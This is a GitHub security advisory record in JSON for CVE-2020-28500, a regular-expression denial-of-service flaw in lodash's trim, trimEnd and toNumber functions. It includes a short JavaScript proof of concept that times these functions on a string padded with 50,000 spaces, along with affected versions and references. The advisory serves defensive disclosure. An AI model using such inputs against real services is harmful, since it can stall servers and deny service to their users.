{"id":"GHSA-29mw-wpgm-hmr9","summary":"Regular Expression Denial of Service (ReDoS) in lodash","details":"All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. \n\nSteps to reproduce (provided by reporter Liyuan Chen):\n```js\nvar lo = require('lodash');\n\nfunction build_blank(n) {\n    var ret = \"1\"\n    for (var i = 0; i \u003c n; i++) {\n        ret += \" \"\n    }\n    return ret + \"1\";\n}\nvar s = build_blank(50000) var time0 = Date.now();\nlo.trim(s) \nvar time_cost0 = Date.now() - time0;\nconsole.log(\"time_cost0: \" + time_cost0);\nvar time1 = Date.now();\nlo.toNumber(s) var time_cost1 = Date.now() - time1;\nconsole.log(\"time_cost1: \" + time_cost1);\nvar time2 = Date.now();\nlo.trimEnd(s);\nvar time_cost2 = Date.now() - time2;\nconsole.log(\"time_cost2: \" + time_cost2);\n```","aliases":["CVE-2020-28500"],"modified":"2025-09-29T20:31:19.418912Z","published":"2022-01-06T20:30:46Z","database_specific":{"cwe_ids":["CWE-1333","CWE-400"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2021-03-19T22:45:28Z","nvd_published_at":"2021-02-15T11:15:00Z"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-28500"},{"type":"WEB","url":"https://github.com/github/advisory-database/pull/6139"},{"type":"WEB","url":"https://github.com/lodash/lodash/pull/5065"},{"type":"WEB","url":"https://github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7"},{"type":"WEB","url":"https://github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a"},{"type":"WEB","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"},{"type":"WEB","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"type":"WEB","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"type":"WEB","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JS-LODASH-1018905"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894"},{"type":"WEB","url":"https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896"},{"type":"WEB","url":"https://security.netapp.com/advisory/ntap-20210312-0006"},{"type":"WEB","url":"https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-28500.yml"},{"type":"WEB","url":"https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8"},{"type":"PACKAGE","url":"https://github.com/lodash/lodash"},{"type":"WEB","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf"}],"affected":[{"package":{"name":"lodash","ecosystem":"npm","purl":"pkg:npm/lodash"},"ranges":[{"type":"SEMVER","events":[{"introduced":"4.0.0"},{"fixed":"4.17.21"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json"}},{"package":{"name":"lodash-es","ecosystem":"npm","purl":"pkg:npm/lodash-es"},"ranges":[{"type":"SEMVER","events":[{"introduced":"4.0.0"},{"fixed":"4.17.21"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json"}},{"package":{"name":"lodash.trimend","ecosystem":"npm","purl":"pkg:npm/lodash.trimend"},"ranges":[{"type":"SEMVER","events":[{"introduced":"4.0.0"},{"last_affected":"4.5.1"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json"}},{"package":{"name":"lodash.trim","ecosystem":"npm","purl":"pkg:npm/lodash.trim"},"ranges":[{"type":"SEMVER","events":[{"introduced":"4.0.0"},{"last_affected":"4.5.1"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json"}},{"package":{"name":"lodash-rails","ecosystem":"RubyGems","purl":"pkg:gem/lodash-rails"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"4.0.0"},{"fixed":"4.17.21"}]}],"versions":["4.0.0","4.11.2","4.12.0","4.13.1","4.14.1","4.15.0","4.16.1","4.16.3","4.16.4","4.16.6","4.17.10","4.17.11","4.17.14","4.17.15","4.17.2","4.17.4","4.17.5","4.3.0","4.5.1","4.6.1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}]}